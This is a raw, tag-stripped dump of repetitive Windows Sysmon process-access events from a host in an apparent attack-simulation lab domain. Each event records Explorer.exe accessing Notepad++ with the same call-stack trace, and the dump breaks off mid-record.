07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 